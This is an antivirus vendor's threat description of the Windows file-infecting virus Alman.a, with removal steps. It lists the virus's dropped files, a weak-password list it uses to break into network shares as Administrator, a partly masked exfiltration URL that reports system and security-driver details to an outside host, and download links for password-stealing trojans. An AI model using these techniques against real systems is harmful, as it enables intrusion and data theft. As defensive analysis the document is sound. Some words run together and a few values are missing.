Internet Security Threats

Virus.Win32.Alman.a

RISK LEVEL:2

This virus infects Windows executable files. It is a Windows PE EXE file.

Installation

When launching, the virus extracts the following files from its body:

%WinDir%\AppPatch\deamon.dll – this file is 3 072 bytes in size;%WinDir%\c_126.nls - this file is 31744 bytes in size. 

It creates the following registry key:

which contains a link to the virus executable file.

The virus infects all write accessible Windows executable files (PE-EXE) onall disks on the victim computer and in accessible network folders. The virusdoes not infect files with the following names:

wooolcfg.exewoool.exeztconfig.exepatchupdate.exetrojankiller.exexy2player.exeflyff.exexy2.exeau_unins_web.execabal.execabalmain9x.execabalmain.exemeteor.exepatcher.exemjonline.execonfig.exezuonline.exeuserpic.exemain.exedk2.exeautoupdate.exedbfsupdate.exeasktao.exesealspeed.exexlqy2.exegame.exewb-service.exenbt-dragonraja2006.exedragonraja.exemhclient-connect.exehs.exemts.exegc.exezfs.exeneuz.exemaplestory.exensstarter.exenmcosrv.execa.exenmservice.exekartrider.exeaudition.exezhengtu.exe

The virus writes its executable file to the beginning of the file being infected,displacing the original contents of the file downwards.

In order to infect files located in network folders, the virus attempts toconnect to remote machines using the Administrator account and one of the followingpasswords:

zxcvqazwsxqazqwer!@#$%^&*()!@#$%^&*(!@#$%^&*!@#$%^&!@#$%^!@#$%aasdf sdfgh!@#$654321123456123451234123111

The virus also sends information to the remote malicious user's site aboutthe amount of free space on the C disk, the operating system and Internet Explorerversions on the victim machine, and about the presence of drivers in the systemwhich have one of the names listed below:

HooksysKWatch3KregExKLPFNaiAvFilter1NAVAPAVGNTMGRAvgTdinod32drvPavProtectTMFilterBDFsDrvVETFDDNT

This information is sent in the following request to the remote malicioususer's site:

http://****mrw0rldwide.com/co.asp?action=post&HD=<amount of free space>&OT=<operating system version> &IV=<version of Internet Explorer>&AV=<installed drivers>

The virus also gets a list of files to be downloaded from the following link:

It then downloads files from the list, saves them to the Windows temporarydirectory and launches them for execution.

At the time of writing, the virus downloaded files from the following links:

http://down****net/css.jpghttp://down****net/wow.jpg

and saved them as shown below:

%Temp%\css.jpg - this file is 62 792 bytes in size. It will be detected by KasperskyAnti-Virus as Trojan-PSW.Win32.OnLineGames.afd;

%Temp%\wow.jpg - this file is 40 241 bytes in size. It will be detected by KasperskyAnti-Virus as Trojan-PSW.Win32.WOW.sv.

If your computer does not have an up-to-date antivirus, or does not have anantivirus solution at all, follow the instructions below to delete the maliciousprogram:

1. Use TaskManager to terminate the malicious process.
2. Delete the original virus file (the location will depend on howthe program originally penetrated the victim machine).
3. Delete the following parameter from the system registry (seeWhatis a system registry and how do I use it for details on how to edit the registry).
   [HKCR\CLSID\{C111980D-B372-44b4-8095-1B6060E8C647}]
4. Delete the following files:

   %WinDir%\AppPatch\deamon.dll%WinDir%\c_126.nls%Temp%\css.jpg%Temp%\wow.jpg

5. Delete all copies of the virus from the hard disk:
6. Update your antivirus databases and perform a full scan of thecomputer (download a trial version of Kaspersky Anti-Virus).